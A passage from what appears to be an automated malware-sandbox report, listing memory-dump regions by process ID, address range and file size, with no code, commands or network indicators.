
                    • memory/832-193-0x0000000006450000-0x0000000006451000-memory.dmp
                      Filesize

                      4KB

                    • memory/832-35-0x0000000070A80000-0x000000007116E000-memory.dmp
                      Filesize

                      6.9MB

                    • memory/832-221-0x0000000006660000-0x0000000006661000-memory.dmp
                      Filesize

                      4KB

                    • memory/832-22-0x0000000000000000-mapping.dmp
                    • memory/968-281-0x0000000000000000-mapping.dmp
                    • memory/968-292-0x00000000026D0000-0x00000000026D4000-memory.dmp
                      Filesize

                      16KB

                    • memory/996-21-0x0000000000000000-mapping.dmp
                    • memory/1032-254-0x0000000000000000-mapping.dmp
                    • memory/1052-312-0x0000000000000000-mapping.dmp
                    • memory/1072-29-0x0000000000000000-mapping.dmp
                    • memory/1116-377-0x00000000706E0000-0x0000000070DCE000-memory.dmp
                      Filesize

                      6.9MB

                    • memory/1116-379-0x0000000004AC0000-0x0000000004AC1000-memory.dmp
                      Filesize

                      4KB

                    • memory/1116-374-0x0000000000000000-mapping.dmp
                    • memory/1116-380-0x0000000004810000-0x0000000004811000-memory.dmp
                      Filesize

                      4KB

                    • memory/1116-378-0x00000000024E0000-0x00000000024E1000-memory.dmp
                      Filesize

                      4KB

                    • memory/1116-381-0x0000000005400000-0x0000000005401000-memory.dmp
                      Filesize

                      4KB

                    • memory/1304-641-0x0000000000000000-mapping.dmp
                    • memory/1468-164-0x0000000000000000-mapping.dmp
                    • memory/1472-30-0x0000000000000000-mapping.dmp
                    • memory/1472-39-0x0000000070A80000-0x000000007116E000-memory.dmp
                      Filesize

                      6.9MB

                    • memory/1540-317-0x0000000000400000-0x0000000000420000-memory.dmp
                      Filesize

                      128KB

                    • memory/1540-318-0x000000000041A684-mapping.dmp
                    • memory/1540-320-0x0000000000400000-0x0000000000420000-memory.dmp
                      Filesize

                      128KB

                    • memory/1580-185-0x00000000067A0000-0x00000000067A1000-memory.dmp
                      Filesize

                      4KB

                    • memory/1580-36-0x0000000070A80000-0x000000007116E000-memory.dmp
                      Filesize

                      6.9MB

                    • memory/1580-32-0x0000000000000000-mapping.dmp
                    • memory/1612-253-0x0000000000000000-mapping.dmp
                    • memory/1700-0-0x0000000000000000-mapping.dmp
                    • memory/1776-11-0x0000000000000000-mapping.dmp
                    • memory/1788-10-0x0000000000000000-mapping.dmp
                    • memory/1844-4-0x0000000000000000-mapping.dmp
                    • memory/1844-5-0x0000000000000000-mapping.dmp
                    • memory/1872-8-0x0000000000000000-mapping.dmp
                    • memory/1884-358-0x00000000002C0000-0x00000000002D1000-memory.dmp
                      Filesize

                      68KB

                    • memory/1884-338-0x0000000000000000-mapping.dmp
                    • memory/1884-359-0x0000000000340000-0x0000000000343000-memory.dmp
                      Filesize

                      12KB

                    • memory/1884-348-0x0000000000390000-0x0000000000391000-memory.dmp
                      Filesize

                      4KB

                    • memory/1884-346-0x0000000000830000-0x0000000000831000-memory.dmp
                      Filesize

                      4KB

                    • memory/1884-344-0x00000000706E0000-0x0000000070DCE000-memory.dmp
                      Filesize

                      6.9MB

                    • memory/1912-345-0x0000000000000000-mapping.dmp
                    • memory/1940-69-0x00000000057C0000-0x00000000057C1000-memory.dmp
                      Filesize

                      4KB

                    • memory/1940-19-0x0000000070A80000-0x000000007116E000-memory.dmp
                      Filesize

                      6.9MB

                    • memory/1940-77-0x0000000006390000-0x0000000006391000-memory.dmp
                      Filesize

                      4KB

                    • memory/1940-84-0x00000000063C0000-0x00000000063C1000-memory.dmp
                      Filesize

                      4KB

                    • memory/1940-13-0x0000000000000000-mapping.dmp
                    • memory/1940-70-0x00000000058A0000-0x00000000058A1000-memory.dmp
                      Filesize

                      4KB

                    • memory/1940-64-0x0000000005830000-0x0000000005831000-memory.dmp
                      Filesize

                      4KB

                    • memory/1944-37-0x0000000001110000-0x0000000001111000-memory.dmp
                      Filesize

                      4KB

                    • memory/1944-20-0x0000000070A80000-0x000000007116E000-memory.dmp
                      Filesize

                      6.9MB

                    • memory/1944-42-0x0000000004A70000-0x0000000004A71000-memory.dmp
                      Filesize

                      4KB

                    • memory/1944-12-0x0000000000000000-mapping.dmp
                    • memory/1944-56-0x0000000004A10000-0x0000000004A11000-memory.dmp
                      Filesize

                      4KB

                    • memory/1984-637-0x0000000000000000-mapping.dmp
                    • memory/1984-634-0x0000000000000000-mapping.dmp
                    • memory/1984-632-0x0000000000110000-0x0000000000111000-memory.dmp
                      Filesize

                      4KB

                    • memory/1984-639-0x0000000000180000-0x0000000000181000-memory.dmp
                      Filesize

                      4KB

                    • memory/1984-630-0x0000000000000000-mapping.dmp
                    • memory/1984-629-0x00000000000D0000-0x00000000000D1000-memory.dmp
                      Filesize

                      4KB

                    • memory/1984-640-0x0000000000000000-mapping.dmp
                    • memory/1988-383-0x0000000002F80000-0x0000000002FCC000-memory.dmp
                      Filesize

                      304KB

                    • memory/1988-329-0x0000000000000000-mapping.dmp
                    • memory/1988-638-0x0000000010530000-0x000000001054A000-memory.dmp
                      Filesize

                      104KB

                    • memory/1988-624-0x0000000050480000-0x000000005049A000-memory.dmp
                      Filesize

                      104KB

                    • memory/2028-16-0x0000000000000000-mapping.dmp
                    • memory/2064-260-0x000000000043FCC3-mapping.dmp
                    • memory/2064-258-0x0000000000400000-0x0000000000493000-memory.dmp
                      Filesize

                      588KB

                    • memory/2064-262-0x0000000000400000-0x0000000000493000-memory.dmp
                      Filesize

                      588KB

                    • memory/2084-172-0x000000000043FCC3-mapping.dmp
                    • memory/2096-276-0x0000000000000000-mapping.dmp
                    • memory/2108-277-0x0000000000000000-mapping.dmp
                    • memory/2176-177-0x0000000000417A8B-mapping.dmp
                    • memory/2248-642-0x0000000000000000-mapping.dmp
                    • memory/2348-415-0x0000000000000000-mapping.dmp
                    • memory/2348-489-0x0000000000000000-mapping.dmp
                    • memory/2348-603-0x0000000000000000-mapping.dmp
                    • memory/2348-557-0x0000000000000000-mapping.dmp
                    • memory/2348-583-0x0000000000000000-mapping.dmp
                    • memory/2348-605-0x0000000000000000-mapping.dmp
                    • memory/2348-607-0x0000000000000000-mapping.dmp
                    • memory/2348-609-0x0000000000000000-mapping.dmp
                    • memory/2348-611-0x0000000000000000-mapping.dmp
                    • memory/2348-581-0x0000000000000000-mapping.dmp
                    • memory/2348-579-0x0000000000000000-mapping.dmp
                    • memory/2348-577-0x0000000000000000-mapping.dmp
                    • memory/2348-575-0x0000000000000000-mapping.dmp
                    • memory/2348-555-0x0000000000000000-mapping.dmp
                    • memory/2348-573-0x0000000000000000-mapping.dmp
                    • memory/2348-587-0x0000000000000000-mapping.dmp
                    • memory/2348-553-0x0000000000000000-mapping.dmp
                    • memory/2348-571-0x0000000000000000-mapping.dmp
                    • memory/2348-613-0x0000000000000000-mapping.dmp
                    • memory/2348-569-0x0000000000000000-mapping.dmp
                    • memory/2348-567-0x0000000000000000-mapping.dmp
                    • memory/2348-565-0x0000000000000000-mapping.dmp
                    • memory/2348-563-0x0000000000000000-mapping.dmp
                    • memory/2348-561-0x0000000000000000-mapping.dmp
                    • memory/2348-615-0x0000000000000000-mapping.dmp
                    • memory/2348-425-0x0000000000000000-mapping.dmp
                    • memory/2348-589-0x0000000000000000-mapping.dmp
                    • memory/2348-591-0x0000000000000000-mapping.dmp
                    • memory/2348-619-0x0000000000000000-mapping.dmp
                    • memory/2348-551-0x0000000000000000-mapping.dmp
                    • memory/2348-549-0x0000000000000000-mapping.dmp
                    • memory/2348-547-0x0000000000000000-mapping.dmp
                    • memory/2348-427-0x0000000000000000-mapping.dmp
                    • memory/2348-621-0x0000000000000000-mapping.dmp
                    • memory/2348-543-0x0000000000000000-mapping.dmp
                    • memory/2348-623-0x0000000000000000-mapping.dmp
                    • memory/2348-601-0x0000000000000000-mapping.dmp
                    • memory/2348-625-0x0000000003C80000-0x0000000003C81000-memory.dmp
                      Filesize

                      4KB

                    • memory/2348-626-0x0000000000000000-mapping.dmp
                    • memory/2348-599-0x0000000000000000-mapping.dmp
                    • memory/2348-597-0x0000000000000000-mapping.dmp
                    • memory/2348-595-0x0000000000000000-mapping.dmp
                    • memory/2348-559-0x0000000000000000-mapping.dmp
                    • memory/2348-384-0x00000000000A0000-0x00000000000A1000-memory.dmp
                      Filesize

                      4KB

                    • memory/2348-385-0x0000000000000000-mapping.dmp
                    • memory/2348-386-0x00000000000E0000-0x00000000000E1000-memory.dmp
                      Filesize

                      4KB

                    • memory/2348-387-0x0000000000000000-mapping.dmp
                    • memory/2348-389-0x0000000000000000-mapping.dmp
                    • memory/2348-391-0x0000000000000000-mapping.dmp
                    • memory/2348-393-0x0000000000000000-mapping.dmp
                    • memory/2348-395-0x0000000000000000-mapping.dmp
                    • memory/2348-397-0x0000000000000000-mapping.dmp
                    • memory/2348-399-0x0000000000000000-mapping.dmp
                    • memory/2348-401-0x0000000000000000-mapping.dmp
                    • memory/2348-403-0x0000000000000000-mapping.dmp
                    • memory/2348-405-0x0000000000000000-mapping.dmp
                    • memory/2348-407-0x0000000000000000-mapping.dmp
                    • memory/2348-409-0x0000000000000000-mapping.dmp
                    • memory/2348-411-0x0000000000000000-mapping.dmp
                    • memory/2348-413-0x0000000000000000-mapping.dmp
                    • memory/2348-593-0x0000000000000000-mapping.dmp
                    • memory/2348-417-0x0000000000000000-mapping.dmp
                    • memory/2348-419-0x0000000000000000-mapping.dmp
                    • memory/2348-421-0x0000000000000000-mapping.dmp
                    • memory/2348-505-0x0000000000000000-mapping.dmp
                    • memory/2348-617-0x0000000000000000-mapping.dmp
                    • memory/2348-545-0x0000000000000000-mapping.dmp
                    • memory/2348-429-0x0000000000000000-mapping.dmp
                    • memory/2348-431-0x0000000000000000-mapping.dmp
                    • memory/2348-433-0x0000000000000000-mapping.dmp
                    • memory/2348-435-0x0000000000000000-mapping.dmp
                    • memory/2348-437-0x0000000000000000-mapping.dmp
                    • memory/2348-439-0x0000000000000000-mapping.dmp
                    • memory/2348-441-0x0000000000000000-mapping.dmp
                    • memory/2348-443-0x0000000000000000-mapping.dmp
                    • memory/2348-445-0x0000000000000000-mapping.dmp
                    • memory/2348-447-0x0000000000000000-mapping.dmp
                    • memory/2348-449-0x0000000000000000-mapping.dmp
                    • memory/2348-451-0x0000000000000000-mapping.dmp
                    • memory/2348-453-0x0000000000000000-mapping.dmp
                    • memory/2348-455-0x0000000000000000-mapping.dmp
                    • memory/2348-457-0x0000000000000000-mapping.dmp
                    • memory/2348-459-0x0000000000000000-mapping.dmp
                    • memory/2348-461-0x0000000000000000-mapping.dmp
                    • memory/2348-463-0x0000000000000000-mapping.dmp
                    • memory/2348-465-0x0000000000000000-mapping.dmp
                    • memory/2348-467-0x0000000000000000-mapping.dmp
                    • memory/2348-469-0x0000000000000000-mapping.dmp
                    • memory/2348-471-0x0000000000000000-mapping.dmp
                    • memory/2348-473-0x0000000000000000-mapping.dmp
                    • memory/2348-475-0x0000000000000000-mapping.dmp
                    • memory/2348-477-0x0000000000000000-mapping.dmp
                    • memory/2348-479-0x0000000000000000-mapping.dmp
                    • memory/2348-481-0x0000000000000000-mapping.dmp
                    • memory/2348-483-0x0000000000000000-mapping.dmp
                    • memory/2348-485-0x0000000000000000-mapping.dmp
                    • memory/2348-487-0x0000000000000000-mapping.dmp
                    • memory/2348-585-0x0000000000000000-mapping.dmp
                    • memory/2348-491-0x0000000000000000-mapping.dmp
                    • memory/2348-493-0x0000000000000000-mapping.dmp
                    • memory/2348-495-0x0000000000000000-mapping.dmp
                    • memory/2348-497-0x0000000000000000-mapping.dmp
                    • memory/2348-499-0x0000000000000000-mapping.dmp
                    • memory/2348-501-0x0000000000000000-mapping.dmp
                    • memory/2348-503-0x0000000000000000-mapping.dmp
                    • memory/2348-423-0x0000000000000000-mapping.dmp
                    • memory/2348-507-0x0000000000000000-mapping.dmp
                    • memory/2348-509-0x0000000000000000-mapping.dmp
                    • memory/2348-511-0x0000000000000000-mapping.dmp
                    • memory/2348-513-0x0000000000000000-mapping.dmp
                    • memory/2348-515-0x0000000000000000-mapping.dmp
                    • memory/2348-517-0x0000000000000000-mapping.dmp
                    • memory/2348-519-0x0000000000000000-mapping.dmp
                    • memory/2348-521-0x0000000000000000-mapping.dmp
                    • memory/2348-523-0x0000000000000000-mapping.dmp
                    • memory/2348-525-0x0000000000000000-mapping.dmp
                    • memory/2348-527-0x0000000000000000-mapping.dmp
                    • memory/2348-529-0x0000000000000000-mapping.dmp
                    • memory/2348-531-0x0000000000000000-mapping.dmp
                    • memory/2348-533-0x0000000000000000-mapping.dmp
                    • memory/2348-535-0x0000000000000000-mapping.dmp
                    • memory/2348-537-0x0000000000000000-mapping.dmp
                    • memory/2348-539-0x0000000000000000-mapping.dmp
                    • memory/2348-541-0x0000000000000000-mapping.dmp
                    • memory/2424-288-0x0000000000400000-0x0000000000434000-memory.dmp
                      Filesize

                      208KB

                    • memory/2424-286-0x0000000000417A8B-mapping.dmp
                    • memory/2424-285-0x0000000000400000-0x0000000000434000-memory.dmp
                      Filesize

                      208KB

                    • memory/2460-375-0x0000000000A70000-0x0000000000A94000-memory.dmp
                      Filesize

                      144KB

                    • memory/2460-373-0x0000000000830000-0x0000000000853000-memory.dmp
                      Filesize

                      140KB

                    • memory/2460-326-0x00000000011F0000-0x00000000011F1000-memory.dmp
                      Filesize

                      4KB

                    • memory/2460-325-0x00000000706E0000-0x0000000070DCE000-memory.dmp
                      Filesize

                      6.9MB

                    • memory/2460-322-0x0000000000000000-mapping.dmp
                    • memory/2472-313-0x0000000000000000-mapping.dmp
                    • memory/2480-636-0x0000000000000000-mapping.dmp
                    • memory/2520-104-0x0000000000000000-mapping.dmp
                    • memory/2524-332-0x0000000000000000-mapping.dmp
                    • memory/2524-349-0x0000000000270000-0x0000000000282000-memory.dmp
                      Filesize

                      72KB

                    • memory/2524-335-0x00000000706E0000-0x0000000070DCE000-memory.dmp
                      Filesize

                      6.9MB

                    • memory/2524-336-0x0000000000FC0000-0x0000000000FC1000-memory.dmp
                      Filesize

                      4KB

                    • memory/2524-356-0x0000000004CD0000-0x0000000004CD2000-memory.dmp
                      Filesize

                      8KB

                    • memory/2524-343-0x00000000001D0000-0x00000000001D1000-memory.dmp
                      Filesize

                      4KB

                    • memory/2524-351-0x0000000004CD0000-0x0000000004CD2000-memory.dmp
                      Filesize

                      8KB

                    • memory/2524-350-0x0000000000520000-0x0000000000525000-memory.dmp
                      Filesize

                      20KB

                    • memory/2552-115-0x000007FEF63E0000-0x000007FEF665A000-memory.dmp
                      Filesize

                      2.5MB

                    • memory/2604-110-0x0000000000000000-mapping.dmp
                    • memory/2620-628-0x0000000000000000-mapping.dmp
                    • memory/2632-114-0x0000000000000000-mapping.dmp
                    • memory/2664-125-0x0000000000400000-0x0000000000498000-memory.dmp
                      Filesize

                      608KB

                    • memory/2664-122-0x000000000043FCC3-mapping.dmp
                    • memory/2664-120-0x0000000000400000-0x0000000000498000-memory.dmp
                      Filesize

                      608KB

                    • memory/2712-128-0x0000000000400000-0x0000000000439000-memory.dmp
                      Filesize

                      228KB

                    • memory/2712-129-0x0000000000417A8B-mapping.dmp
                    • memory/2712-135-0x0000000000400000-0x0000000000439000-memory.dmp
                      Filesize

                      228KB

                    • memory/2736-137-0x0000000000400000-0x0000000000425000-memory.dmp
                      Filesize

                      148KB

                    • memory/2736-132-0x0000000000400000-0x0000000000425000-memory.dmp
                      Filesize

                      148KB

                    • memory/2736-133-0x000000000041A684-mapping.dmp
                    • memory/2764-633-0x0000000000000000-mapping.dmp
                    • memory/2852-291-0x0000000000000000-mapping.dmp
                    • memory/2852-314-0x0000000000320000-0x0000000000344000-memory.dmp
                      Filesize

                      144KB

                    • memory/2852-297-0x0000000000200000-0x0000000000201000-memory.dmp
                      Filesize

                      4KB

                    • memory/2852-295-0x0000000000830000-0x0000000000831000-memory.dmp
                      Filesize

                      4KB

                    • memory/2852-294-0x0000000070DD0000-0x00000000714BE000-memory.dmp
                      Filesize

                      6.9MB

                    • memory/2860-354-0x0000000000000000-mapping.dmp
                    • memory/2876-340-0x0000000000000000-mapping.dmp
                    • memory/2920-255-0x0000000004A60000-0x0000000004B10000-memory.dmp
                      Filesize

                      704KB

                    • memory/2920-257-0x00000000008E0000-0x00000000008ED000-memory.dmp
                      Filesize

                      52KB

                    • memory/2920-145-0x0000000000000000-mapping.dmp
                    • memory/2920-150-0x0000000000E20000-0x0000000000E21000-memory.dmp
                      Filesize

                      4KB

                    • memory/2920-148-0x0000000070A80000-0x000000007116E000-memory.dmp
                      Filesize

                      6.9MB

                    • memory/2928-270-0x0000000000340000-0x0000000000341000-memory.dmp
                      Filesize

                      4KB

                    • memory/2928-265-0x0000000000000000-mapping.dmp
                    • memory/2928-280-0x0000000004220000-0x0000000004271000-memory.dmp
                      Filesize

                      324KB

                    • memory/2928-268-0x0000000000350000-0x0000000000351000-memory.dmp
                      Filesize

                      4KB

                    • memory/2928-267-0x0000000072BB0000-0x000000007329E000-memory.dmp
                      Filesize

                      6.9MB

                    • memory/2944-363-0x00000000706E0000-0x0000000070DCE000-memory.dmp
                      Filesize

                      6.9MB

                    • memory/2944-367-0x0000000005420000-0x0000000005421000-memory.dmp
                      Filesize

                      4KB

                    • memory/2944-361-0x0000000000000000-mapping.dmp
                    • memory/2944-364-0x0000000002500000-0x0000000002501000-memory.dmp
                      Filesize

                      4KB

                    • memory/2944-365-0x00000000048D0000-0x00000000048D1000-memory.dmp
                      Filesize

                      4KB

                    • memory/2944-366-0x0000000004810000-0x0000000004811000-memory.dmp
                      Filesize

                      4KB

                    • memory/2976-154-0x0000000000000000-mapping.dmp
                    • memory/2992-256-0x0000000000000000-mapping.dmp
                    • memory/3052-160-0x0000000000000000-mapping.dmp